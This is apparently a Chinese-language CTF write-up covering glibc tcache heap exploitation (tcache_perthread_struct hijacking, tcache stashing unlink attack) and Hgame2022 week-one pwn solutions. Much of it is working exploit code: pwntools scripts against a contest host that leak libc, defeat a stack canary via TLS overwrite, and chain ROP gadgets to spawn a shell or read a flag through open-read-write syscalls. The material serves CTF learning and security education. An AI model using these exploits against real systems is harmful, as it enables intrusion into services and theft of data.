0x555555559040: 0x0000000000000000 0x0000000000000000
0x555555559050: 0x0000000000000000 0x0000000000000000
0x555555559060: 0x0000000000000000 0x0000000000000000
0x555555559070: 0x0000000000000000 0x0000000000000000
0x555555559080: 0x0000000000000000 0x0000000000000000
0x555555559090: 0x00005555555592e0 0x0000000000000000 // tcache_entry
0x5555555590a0: 0x0000000000000000 0x0000555555559300
0x5555555590b0: 0x0000555555559350 0x00005555555593b0
1
2
3
4
5
6
12:00900x555555559090 —▸ 0x5555555592e0 —▸ 0x5555555592c0 —▸ 0x5555555592a0 ◂— 0x0 // 这里可以看出"tachebin"和"fastbin" "smallbin"一样,采用"插头"的方法进入链表
13:00980x555555559098 ◂— 0x0
14:00a0│ 0x5555555590a0 ◂— 0x0
15:00a8│ 0x5555555590a8 —▸ 0x555555559300 ◂— 0x0
16:00b0│ 0x5555555590b0 —▸ 0x555555559350 ◂— 0x0
17:00b8│ 0x5555555590b8 —▸ 0x5555555593b0 ◂— 0x0

注意:这是在 libc-2.31 中看到的数据,更高的 libc 版本可以会不同(以GDB看到的为准)

常见利用姿势:

一,针对“count”进行攻击:将 “sizeof(tcache_perthread_struct)” 大小对应的count设置为7,释放 tcache_perthread_struct 后,就会把整个 tcache_perthread_struct 放入 unsortedbin

这里我写了一个 tiny pwn 来加强理解,源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int main(){

unsigned long* chunk=malloc(0x10);
unsigned long* target=malloc(0x280);
unsigned long* heap_addr=chunk-2-0x290/8;

printf("heap_addr = 0x%x\n",heap_addr);

free(target); // 为了暴露目标count的位置
memset(heap_addr+2,0,72);
read(0,heap_addr+2+9,0x400);

free(heap_addr+2);
return 0;
}

攻击脚本:

1
2
3
4
5
6
7
8
9
from pwn import*

p=process('./test')

gdb.attach(p)
p.sendline(p64(0x0007000000000000))
pause()

p.interactive()

打印“tcache_perthread_struct”

1
2
3
4
5
6
7
8
pwndbg> x/20xg 0x5631b9f86000
0x5631b9f86000: 0x0000000000000000 0x0000000000000291
0x5631b9f86010: 0x0000000000000000 0x0000000000000000
0x5631b9f86020: 0x0000000000000000 0x0000000000000000
0x5631b9f86030: 0x0000000000000000 0x0000000000000000
0x5631b9f86040: 0x0000000000000000 0x0000000000000000
0x5631b9f86050: 0x0000000000000000 0x0001000000000000 // 发现目标,尝试覆盖'1'为'7'
0x5631b9f86060: 0x0000000000000000 0x0000000000000000

这里的“72字节”偏移是一个比较固定的值,可以记住,当然也可以用我这种办法来查找“count”

1
2
3
4
5
6
7
8
pwndbg> x/20xg 0x5631b9f86000
0x5631b9f86000: 0x0000000000000000 0x0000000000000291
0x5631b9f86010: 0x0000000000000000 0x0000000000000000
0x5631b9f86020: 0x0000000000000000 0x0000000000000000
0x5631b9f86030: 0x0000000000000000 0x0000000000000000
0x5631b9f86040: 0x0000000000000000 0x0000000000000000
0x5631b9f86050: 0x0000000000000000 0x0007000000000000
0x5631b9f86060: 0x000000000000000a 0x0000000000000000
1
2
unsortedbin
all: 0x5631b9f86000 —▸ 0x7f25cd8e1be0 (main_arena+96) ◂— 0x5631b9f86000

攻击效果:这种攻击可以创造 unsortedbin ,在限制了 size,无法获取 unsorted chunk 的程序中较为常见,后续可以 link libc_base,也可以覆盖地址打 house of roman

利用条件:条件只有一个 - 控制“tcache_perthread_struct”,

  • 利用 Double free,tcache dup 重复申请“tcache_perthread_struct”,
  • 用WAA,或者程序提供的输入,直接写“count”
  • 通过 unlink 实现 overlap ,写入“tcache_perthread_struct”并申请(有现成的“size”)

二,针对“tcache_entry”进行攻击:这个就真的简单粗暴了,可以直接申请任意地址

这个 tiny pwn 就比较简单了,源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
int main(){

unsigned long* chunk=malloc(0x10);
unsigned long* target=malloc(0x280);
unsigned long* heap_addr=chunk-2-0x290/8;
int fake_addr;

printf("heap_addr = 0x%x\n",heap_addr);
printf("fake_addr = 0x%x\n",&fake_addr);
read(0,heap_addr+2,0x400);

return 0;
}

攻击脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import*

p=process('./test')
context.log_level='debug' # 开这个主要是看"fake_addr"对不对

gdb.attach(p)
p.recvuntil('fake_addr = ')
fake_addr=eval(p.recvuntil('\n')[:-1])
success('fake_addr >> '+hex(fake_addr))
p.send('\x00'*0x90+p64(fake_addr))
pause()

p.interactive()
1
[+] fake_addr >> 0xcf63319c
1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> x/20xg 0x555940911000
0x555940911000: 0x0000000000000000 0x0000000000000291
0x555940911010: 0x0000000000000000 0x0000000000000000
0x555940911020: 0x0000000000000000 0x0000000000000000
0x555940911030: 0x0000000000000000 0x0000000000000000
0x555940911040: 0x0000000000000000 0x0000000000000000
0x555940911050: 0x0000000000000000 0x0000000000000000
0x555940911060: 0x0000000000000000 0x0000000000000000
0x555940911070: 0x0000000000000000 0x0000000000000000
0x555940911080: 0x0000000000000000 0x0000000000000000
0x555940911090: 0x0000000000000000 0x0000000000000000 // '0x20'的tcache
0x5559409110a0: 0x00000000cf63319c 0x0000000000000000 // '0x40'的tcache
0x5559409110b0: 0x0000000000000000 0x0000000000000000 // '0x60'的tcache
1
2
tcachebins
0x40 [ 0]: 0xcf63319c // fake_addr

常见利用过程:

  • 先劫持“count”把整个“tcache_perthread_struct”放入unsortedbin
  • 然后申请两个“0x48”来分割unsortedbin,使 main_arena 写入 '0x60' tcache
  • '0x40' tcache 处写入 '0x60' tcache addr (需要申请“0x48”才能做到)
  • 申请“0x30”(实际位置为'0x60' tcache),覆盖低地址为 hook
  • 申请“0x50”(实际位置为 hook),打入 one_gadget

关键在于:使 '0x40' tcache 中装有 '0x60' tcache addr ,使其可以通过申请“0x30”来修改 '0x60' tcache 的地址(劫持大小为“0x60”的tcachebin)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pwndbg> x/20xg 0x558b1cfcd000
0x558b1cfcd000: 0x0000000000000000 0x0000000000000051 // 申请"0x48"
0x558b1cfcd010: 0x0001000200000000 0x0000000000000001
0x558b1cfcd020: 0x0000000000000000 0x0000000000000000
0x558b1cfcd030: 0x0000000000000000 0x0000000000000000
0x558b1cfcd040: 0x0000000000000000 0x0000000000000000
0x558b1cfcd050: 0x0000000000000000 0x0000000000000051 // 申请"0x48"
0x558b1cfcd060: 0x0000000558b1ce3c 0x0000558b1cfcd010 // 释放第二个"0x40"
0x558b1cfcd070: 0x0000000000000000 0x0000000000000000
0x558b1cfcd080: 0x0000000000000000 0x0000000000000000
0x558b1cfcd090: 0x0000000000000000 0x0000000000000000
0x558b1cfcd0a0: 0x0000558b1cfcd0b0 0x0000558b1cfcd060 // '0x40'的tcache
/* 伪造'0x40'的tcache(带有main_arena) */
0x558b1cfcd0b0: 0x00007fea097ddc00 0x00007fea097ddc00 // '0x60'的tcache
/* 这里曾经是unsortedbin,所以main_arena留下来了 */

tcache stashing unlink attack

很多时候常常把 tcache stashing unlink attack 和 tcache stashing unlink attack+ 称为同一种技术,但它们的功能不同

具体的利用方式如下:

  • tcachebin[A] 为空
  • smallbin[A]8
  • 修改第 8smallbin chunkbkaddr
  • 分配 malloc(A) 的时候,addr+0x10 会被写一个 libc 地址

tcache stashing unlink attack+

这种攻击利用的是 tcache bin 中有剩余(数量小于 TCACHE_MAX_BINS)时,同大小的 small bin 会放进 tcache 中(这种情况可以使用 calloc 分配同大小堆块触发,因为 calloc 分配堆块时不从tcache bin 中选取)

在获取到一个 smallbin 中的一个 chunk 后,如果 tcache 任由足够空闲位置,会将剩余的 smallbin 挂进 tcache 中,在这个过程中只对第一个 bin 进行了完整性检查,后面的堆块的检查缺失

当攻击者可以修改一个 small bin 的 bk 时,就可以实现在任意地址上写一个 libc 地址

具体有两种伪造方法:

  • 第一种,适用于没有 calloc:
    • tcachebin[A] 为空
    • smallbin[A]8
    • 修改第 7smallbin chunkbkaddr,还要保证 addr+0x18 是一个合法可写的地址
    • 分配 malloc(A) 的时候,addr 会被链入到 tcachebin,也就是可以分配到 addr
  • 第二种,适用于有 calloc 但限制了申请次数:
    • tcachebin[A] 不为满(如果程序中存在 malloc,则可以忽略此条件)
    • smallbin[A]2
    • 修改第 2smallbin chunkbkaddr,还要保证 addr+0x18 是一个合法可写的地址
    • 分配 calloc(A) 的时候,addr 会被链入到 tcachebin,也就是可以分配到 addr

测试案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;

setbuf(stdout, NULL);

printf("stack_var addr is:%p\n",&stack_var[0]);
printf("chunk_lis addr is:%p\n",&chunk_lis[0]);
printf("target addr is:%p\n",(void*)target);

stack_var[3] = (unsigned long)(&stack_var[2]);

for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}

for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}

free(chunk_lis[1]);
free(chunk_lis[0]);
free(chunk_lis[2]);

malloc(0xa0);
malloc(0x90);
malloc(0x90);

chunk_lis[2][1] = (unsigned long)stack_var;
calloc(1,0x90);

target = malloc(0x90);

printf("target now: %p\n",(void*)target);

assert(target == &stack_var[2]);
return 0;
}

刚刚释放掉9个 chunk 后:

1
2
3
4
5
6
7
8
9
10
11
12
tcachebins
0xa0 [ 7]: 0x1b0f340 —▸ 0x1b0f7a0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x1b0f3d0 —▸ 0x1b0f290 —▸ 0x7fcd859d2be0 (main_arena+96) ◂— 0x1b0f3d0
  • 前7个进入 tcache,后2个进入 unsortedbin

重新申请回2个 chunk 后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
tcachebins
0xa0 [ 5]: 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0: 0x1b0f3d0 —▸ 0x1b0f290 —▸ 0x7fcd859d2c70 (main_arena+240) ◂— 0x1b0f3d0
  • malloc(0xa0) 只是为了使 unsorted chunk 进入 smallbin

写入 stack_var 并调用 calloc 申请了一次 small chunk 后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
tcachebins
0xa0 [ 7]: 0x7ffc97e66030 —▸ 0x1b0f3e0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0 [corrupted]
FD: 0x1b0f3d0 —▸ 0x1b0f700 ◂— 0x0
BK: 0x7ffc97e66030 ◂— 0x0
  • 由于修改了 small chunk->bk 为 stack_var,导致程序把 stack_var 给放入了 tcachebin 中
  • tcachebin 采用“插头拿尾”,因此程序会借助 chunk->bk 来识别将会被放入 tcachebin 的 chunk

最后一个 malloc 用于申请 stack_var:

1
2
tcachebins
0xa0 [ 6]: 0x1b0f3e0 —▸ 0x1b0f700 —▸ 0x1b0f660 —▸ 0x1b0f5c0 —▸ 0x1b0f520 —▸ 0x1b0f480 ◂— 0x0

Hgame2022

week1

enter_the_pwn_land

循环输入

64位,dynamically,开了NX

栈溢出,数组越位,数据泄露

入侵思路

可以利用“puts”来泄露地址:

1
2
3
4
5
6
7
8
  0x401209 <test_thread+83>    nop    
0x40120a <test_thread+84> lea rax, [rbp - 0x30]
0x40120e <test_thread+88> mov rdi, rax
0x401211 <test_thread+91> call puts@plt <puts@plt>
s: 0x7ffff7d9bec0 ◂— 0xa61616161 /* 'aaaa\n' */
0x401216 <test_thread+96> nop
0x401217 <test_thread+97> leave
0x401218 <test_thread+98> ret
1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> stack 50
00:0000│ rax rdi rsp rsi-4 0x7ffff7d9bec0 ◂— 0xa61616161 /* 'aaaa\n' */
01:00080x7ffff7d9bec8 ◂— 0x0
... ↓ 2 skipped
04:00200x7ffff7d9bee0 —▸ 0x7ffff7d9c700 ◂— 0x7ffff7d9c700
05:00280x7ffff7d9bee8 ◂— 0x400000001
06:0030│ rbp 0x7ffff7d9bef0 ◂— 0x0
07:00380x7ffff7d9bef8 —▸ 0x7ffff7f9b609 (start_thread+217) ◂— mov qword ptr fs:[0x630], rax
08:00400x7ffff7d9bf00 ◂— 0x0
09:00480x7ffff7d9bf08 —▸ 0x7ffff7d9c700 ◂— 0x7ffff7d9c700
0a:00500x7ffff7d9bf10 —▸ 0x7ffff7d9c700 ◂— 0x7ffff7d9c700
0b:00580x7ffff7d9bf18 ◂— 0x97c3fd3d98d89709
1
2
3
4
5
      0x405000           0x426000 rw-p    21000 0      [heap]
0x7ffff759c000 0x7ffff759d000 ---p 1000 0 [anon_7ffff759c]
0x7ffff759d000 0x7ffff7da0000 rw-p 803000 0 [anon_7ffff759d]
0x7ffff7da0000 0x7ffff7dc5000 r--p 25000 0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7dc5000 0x7ffff7f3d000 r-xp 178000 25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so

libc基地址为“0x7ffff7da0000”

1
2
In [5]: 0x7ffff7da0000-0x7ffff7d9c700
Out[5]: 14592

可以发现:“0x7ffff7d9c700”和“libc基址”的偏移为常数,输入32个“a”即可泄露该数据

1
2
3
4
p.recvuntil('\n')
leak_addr=u64(p.recvline()[:-1].ljust(8,'\x00'))
leak_addr=hex(leak_addr)+'00'
success('leak_addr >> '+leak_addr)

计算“libc基址”,获取一下必要的“gadgets”:

1
2
3
4
5
6
libc_base=int(leak_addr,16)+14592
execve_libc=libc_base+libc.sym['execve']
system_libc=libc_base+libc.sym['system']
puts_libc=libc_base+libc.sym['puts']
bin_sh_libc=libc_base+libc.search('/bin/sh').next()
one_gadget=libc_base+0xe6c84

最后还有一个坑:

覆盖 “s” 的时候会把 “i” 也覆盖了,这里要注意一下

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import*

p=remote('81.68.133.212',31710)
#p=process('./a.out')
elf=ELF('./a.out')
libc=ELF('./libc-2.31.so')

#gdb.attach(p,"b*0x401211")
payload='a'*32
p.sendline(payload)

p.recvuntil('\n')
leak_addr=u64(p.recvline()[:-1].ljust(8,'\x00'))
leak_addr=hex(leak_addr)+'00'
success('leak_addr >> '+leak_addr)

libc_base=int(leak_addr,16)+14592
execve_libc=libc_base+libc.sym['execve']
system_libc=libc_base+libc.sym['system']
puts_libc=libc_base+libc.sym['puts']
bin_sh_libc=libc_base+libc.search('/bin/sh').next()
one_gadget=libc_base+0xe6c84

success('libc_base >> '+hex(libc_base))
success('execve_libc >> '+hex(execve_libc))
success('bin_sh_libc >> '+hex(bin_sh_libc))
success('one_gadget >> '+hex(one_gadget))

pop_rdi_ret=0x0000000000026b72+libc_base
pop_rsi_ret=0x0000000000027529+libc_base
pop_rdx_rbx_ret=0x0000000000162866+libc_base

success('pop_rdi_ret >> '+hex(pop_rdi_ret))
success('pop_rsi_ret >> '+hex(pop_rsi_ret))
success('pop_rdx_rbx_ret >> '+hex(pop_rdx_rbx_ret))


payload='a'*(0x30-4)+p32(0x30-4)+'b'*0x8
payload+=p64(pop_rdi_ret)+p64(bin_sh_libc)
payload+=p64(pop_rsi_ret)+p64(0)
payload+=p64(pop_rdx_rbx_ret)+p64(0)+p64(0)
payload+=p64(execve_libc)

p.sendline(payload)

#pause()

p.interactive()

enter_the_evil_pwn_land

循环输入

64位,dynamically,开了NX

栈溢出,数组越位,数据泄露

入侵思路

前面的过程和 enter_the_pwn_land 一样,只有最后需要多绕一个canary

这里的 “i” 没有坑了,继续之前的操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
payload='a'*32
p.sendline(payload)

p.recvuntil('\n')
leak_addr=u64(p.recvline()[:-1].ljust(8,b'\x00'))
leak_addr=hex(leak_addr)+'00'
success('leak_addr >> '+leak_addr)

libc_base=int(leak_addr,16)+14592
execve_libc=libc_base+libc.sym['execve']
system_libc=libc_base+libc.sym['system']
puts_libc=libc_base+libc.sym['puts']
bin_sh_libc=libc_base+libc.search('/bin/sh').next()
one_gadget=libc_base+0xe6c84

pop_rdi_ret=0x0000000000026b72+libc_base
pop_rsi_ret=0x0000000000027529+libc_base
pop_rdx_rbx_ret=0x0000000000162866+libc_base

但是这里又有一个问题:

1
2
3
4
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
C\x87j\xb3\xb5T
*** stack smashing detected ***: terminated
[*] Got EOF while reading in interactive

传统的覆盖低字节会导致canary报错,但是在申请新线程的程序中,有一种技术可以绕过canary,覆盖TLS中储存的canary值

先用爆破脚本试试TLS的位置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
padding=0x30
offset=1
while True:
p=process('./a.out')
payload = ''
payload += (padding-8)*'a'
payload += 'aaaaaaaa'
payload += p64(0xdeadbeef)
payload += p64(0)
payload += 'a'*(offset-len(payload))
p.sendline(payload)
temp = p.recvall()

if "stack smashing detected" in temp:
offset += 1
print("offset >> "+hex(offset))
p.close()
else:
print("success !!!")
print("offset >> "+hex(offset))
p.close()
break
p.interactive()

为了节约时间,可以把“offset”的起始值设置得大一点

1
2
success !!!
offset >> 0x870

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import*

p=remote('81.68.133.212',39234)
#p=process('./a.out')
elf=ELF('./a.out')
libc=ELF('./libc-2.31.so')

#gdb.attach(p,"b*0x401240")
payload='a'*32
p.sendline(payload)

p.recvuntil('\n')
leak_addr=u64(p.recvline()[:-1].ljust(8,b'\x00'))
leak_addr=hex(leak_addr)+'00'
success('leak_addr >> '+leak_addr)

libc_base=int(leak_addr,16)+14592
execve_libc=libc_base+libc.sym['execve']
system_libc=libc_base+libc.sym['system']
puts_libc=libc_base+libc.sym['puts']
bin_sh_libc=libc_base+libc.search('/bin/sh').next()
one_gadget=libc_base+0xe6c84

success('libc_base >> '+hex(libc_base))
success('execve_libc >> '+hex(execve_libc))
success('bin_sh_libc >> '+hex(bin_sh_libc))
success('one_gadget >> '+hex(one_gadget))

pop_rdi_ret=0x0000000000026b72+libc_base
pop_rsi_ret=0x0000000000027529+libc_base
pop_rdx_rbx_ret=0x0000000000162866+libc_base

success('pop_rdi_ret >> '+hex(pop_rdi_ret))
success('pop_rsi_ret >> '+hex(pop_rsi_ret))
success('pop_rdx_rbx_ret >> '+hex(pop_rdx_rbx_ret))

offset = 0x870
payload='a'*(0x30)+'b'*0x8
payload+=p64(pop_rdi_ret)+p64(bin_sh_libc)
payload+=p64(pop_rsi_ret)+p64(0)
payload+=p64(pop_rdx_rbx_ret)+p64(0)+p64(0)
payload+=p64(execve_libc)
payload=payload.ljust(offset,'a')

p.sendline(payload)

p.interactive()

oldfashion_orw

两次输入

64位,dynamically,开了NX

两次输入,第一次输入“size”,第二次输入“content”

入侵思路

可以利用整数溢出绕过if检查

size_t是标准C库中定义的

  • 在 32 位架构中被普遍定义为:
1
typedef unsigned int size_t;
  • 在 64 位架构中被定义为:
1
typedef unsigned long size_t;

C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数(类型为 int 型)

1
int atoi(const char *str)

所以“nbytes”是“int”类型的

C语言中int的取值范围是:“-2147483648 ~ 2147483647”

1
2
3
num=2147483647+1
payload=str(num)
p.sendafter("size?\n",payload)

绕过了检查,程序开始沙盒,获取不了shell:

但是它给了一个文件:

1
2
3
4
5
6
7
#!/bin/bash

rm /home/ctf/flag*
cp /flag "/home/ctf/flag`head /dev/urandom |cksum |md5sum |cut -c 1-20`"
cd /home/ctf
exec 2>/dev/null
/usr/sbin/chroot --userspec=1000:1000 /home/ctf timeout 300 ./vuln

这里给了我们一个提示,虽然不能“get shell”但是可以打“ORW”

程序还差一个“open”函数,可以在libc中找

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def csu(rbx, rbp, r12, r13, r14, r15, last):
#csu(rbx, rbp, rdi, rsi, rdx, got, last)
payload = 'a'*0x30+'b'*0x8
payload += p64(csu_end_addr)
payload += p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
payload += p64(csu_front_addr)
payload += b'a' * 0x38
payload += p64(last)
p.send(payload)
sleep(1)

csu(0, 1, 1, write_got, 0x8, write_got, main_addr)
p.recvuntil('done!\n')
write_libc=u64(p.recvuntil('size?')[-13:-5])
libc_base=write_libc-write_sym
success('libc_base >> '+hex(libc_base))

open_libc=libc_base+libc.sym['open']
success('open_libc >> '+hex(open_libc))

泄露了“libc_base”,接下来就是利用ROP链进行ORW,在此之前需要找到“syscall;ret”

这里值得注意:通常的ROPgadget不能成功找到“syscall;ret”,需要借助“opcode”

1
2
3
4
5
6
Python 2.7.18 (default, Mar  8 2021, 13:02:45) 
[GCC 9.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import*
>>> asm("syscall;ret").encode('hex')
'0f05c3'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
➜  [/home/ywhkkx/桌面] ROPgadget --binary libc-2.31.so --opcode 0f05c3     
Opcodes information
============================================================
0x0000000000066229 : 0f05c3
0x00000000000870ec : 0f05c3
0x00000000000941a4 : 0f05c3
0x0000000000096aac : 0f05c3
0x0000000000097e29 : 0f05c3
0x00000000000e7249 : 0f05c3
0x00000000000e7259 : 0f05c3
0x00000000000e7269 : 0f05c3
0x00000000000e7279 : 0f05c3
0x00000000000e7289 : 0f05c3
0x00000000000e7299 : 0f05c3

在打ORW之前,需要先获取“flag”文件的文件名称:(flag文件名后面跟了一个随机数)

  • 利用“getdents64(3, bss_addr + 0x200, 0x600) ”:获取当前目录到“bss_addr + 0x200”
  • 利用“write(1, bss_addr + 0x200, 0x600)”:把“bss_addr + 0x200”存储的目录打印出来
  • 因为目标文件以“flag”开头,所以接收flag并把它读到“bss段”中

最后就可以打ORW了

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
# -*- coding:utf-8 -*-
from pwn import*
import time

p=process('./vuln')
#p=remote('81.68.133.212',43917)
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('./vuln')
libc=ELF('./libc-2.31.so')

num=2147483647+1
payload_s=str(num)
p.sendlineafter("size?\n",payload_s)

main_addr=0x000000000401311
bss_addr=0x000000000404040+0x100

read_got=elf.got['read']
write_got=elf.got['write']
prctl_got=elf.got['prctl']
write_sym=libc.sym['write']

csu_front_addr=0x401420
csu_end_addr=0x40143A

def csu(rbx, rbp, r12, r13, r14, r15, last):
#csu(rbx, rbp, rdi, rsi, rdx, got, last)
payload = b'a'*0x30+b'b'*0x8
payload += p64(csu_end_addr)
payload += p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
payload += p64(csu_front_addr)
payload += b'a' * 0x38
payload += p64(last)
p.send(payload)
sleep(1)

csu(0, 1, 1, write_got, 0x8, write_got, main_addr)

p.recvuntil('done!\n')
write_libc=u64(p.recvuntil('size?')[-13:-5])
libc_base=write_libc-write_sym
open_libc=libc_base+libc.sym['open']
read_libc=libc_base+libc.sym['read']
write_libc=libc_base+libc.sym['write']

success('libc_base >> '+hex(libc_base))
success('open_libc >> '+hex(open_libc))
success('read_libc >> '+hex(read_libc))
success('write_libc >> '+hex(write_libc))

leave_ret=0x0000000004013DB
ret=0x000000000040101a
pop_rdi_ret=0x0000000000026b72+libc_base
pop_rsi_ret=0x0000000000027529+libc_base
pop_rdx_r12_ret=0x0000000000162866+libc_base
pop_rax_ret=0x000000000004a550+libc_base
syscall_ret=0x000000000013d63b+libc_base

payload = 'a' * 0x30 + 'b' * 0x8
# read(0, bss_addr, 2)
payload += p64(pop_rdi_ret)+p64(0)
payload += p64(pop_rsi_ret)+p64(bss_addr)
payload += p64(pop_rdx_r12_ret)+p64(2)+p64(0)
payload += p64(elf.sym['read'])
# open(".")
payload += p64(pop_rax_ret)+p64(2)
payload += p64(pop_rdi_ret)+p64(bss_addr)
payload += p64(pop_rsi_ret)+p64(0)
payload += p64(pop_rdx_r12_ret)+p64(0)+p64(0)
payload += p64(syscall_ret)
# getdents64(3, bss_addr + 0x200, 0x600)
payload += p64(pop_rax_ret)+p64(217) # getdents64
payload += p64(pop_rdi_ret)+p64(3)
payload += p64(pop_rsi_ret)+p64(bss_addr + 0x200)
payload += p64(pop_rdx_r12_ret)+p64(0x600)+p64(0)
payload += p64(syscall_ret)
# write(1, bss_addr + 0x200, 0x600)
payload += p64(pop_rax_ret)+p64(1)
payload += p64(pop_rdi_ret)+p64(1)
payload += p64(pop_rsi_ret)+p64(bss_addr + 0x200)
payload += p64(pop_rdx_r12_ret)+p64(0x600)+p64(0)
payload += p64(syscall_ret)
# read(0, bss_addr, 0x30)
payload += p64(pop_rax_ret)+p64(0)
payload += p64(pop_rdi_ret)+p64(0)
payload += p64(pop_rsi_ret)+p64(bss_addr)
payload += p64(pop_rdx_r12_ret)+p64(0x30)+p64(0)
payload += p64(syscall_ret)
# basic orw
payload += p64(pop_rax_ret)+p64(2)
payload += p64(pop_rdi_ret)+p64(bss_addr)
payload += p64(pop_rsi_ret)+p64(0)
payload += p64(pop_rdx_r12_ret)+p64(0)+p64(0)
payload += p64(syscall_ret)
payload += p64(pop_rax_ret)+p64(0)
payload += p64(pop_rdi_ret)+p64(4)
payload += p64(pop_rsi_ret)+p64(bss_addr)
payload += p64(pop_rdx_r12_ret)+p64(0x60)+p64(0)
payload += p64(syscall_ret)
payload += p64(pop_rax_ret)+p64(1)
payload += p64(pop_rdi_ret)+p64(1)
payload += p64(pop_rsi_ret)+p64(bss_addr)
payload += p64(pop_rdx_r12_ret)+p64(0x60)+p64(0)
payload += p64(syscall_ret)

p.sendline(payload_s)
p.sendline(payload)
p.send('.\x00') # read(0, bss_addr, 2) >> open(".")
time.sleep(1)
p.recvuntil('flag') # read(0, bss_addr, 0x30) >> open('xxxx'+flag_s,0)
md5=p.recv(20)
flag='./flag'+md5
p.send(flag)

p.interactive()

ser_per_fa

64位,dynamically,全开

程序给了源码的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
// g++ spfa.cc -o spfa
#include <stdio.h>
#include <stdlib.h>
#include <queue>
#include <string.h>

#define NODES 210
#define EDGES 610

struct EDGE
{
long long nxt, to, dis;
} edge[EDGES];

long long n, m, w, a, b, num_edge, t;
long long head[NODES], vis[NODES], dist[NODES], cnt[NODES];

void _add(long long from, long long to, long long dis)
{
edge[++num_edge].to = to;
edge[num_edge].dis = dis;
edge[num_edge].nxt = head[from];
head[from] = num_edge;
}

void spfa(long long s)
{
std::queue<int> q;
q.push(s);
dist[s] = 0;
vis[s] = 1;
while (!q.empty())
{
long long u = q.front();
q.pop();
vis[u] = 0;
for (long long i = head[u]; i; i = edge[i].nxt)
{
long long v = edge[i].to;
if (dist[v] > dist[u] + edge[i].dis)
{
dist[v] = dist[u] + edge[i].dis;
if (vis[v] == 0)
{
vis[v] = 1;
q.push(v);
}
}
}
}
}

void backd00r()
{
system("/bin/sh");
}

void init_io()
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}

int main()
{
long long t;

init_io();

printf("how many datas?\n>> ");
scanf("%lld", &t);
while (t--)
{
memset(vis, 0, sizeof(vis));
memset(dist, 0, sizeof(dist));
memset(cnt, 0, sizeof(cnt));
memset(head, 0, sizeof(head));
memset(dist, 127 / 3, sizeof(dist));
printf("how many nodes?\n>> ");
scanf("%lld", &n);
printf("how many edges?\n>> ");
scanf("%lld", &m);
printf("input edges in the\n[from] [to] [distant]\nformat\n");
for (long long i = 0; i < m; i++)
{
scanf("%lld%lld%lld", &a, &b, &w);
_add(a, b, w);
}

printf("you want to start from which node?\n>> ");
long long x;
scanf("%lld", &x);

spfa(x);

printf("calc done!\nwhich path you are interested %lld to ?\n>> ", x);
scanf("%lld", &x);
printf("the length of the shortest path is %lld\n", dist[x]);
}
return 0;
}

SPFA 算法:

从图中的某个顶点出发到达另外一个顶点的所经过的边的权重和最小的一条路径,称为最短路径

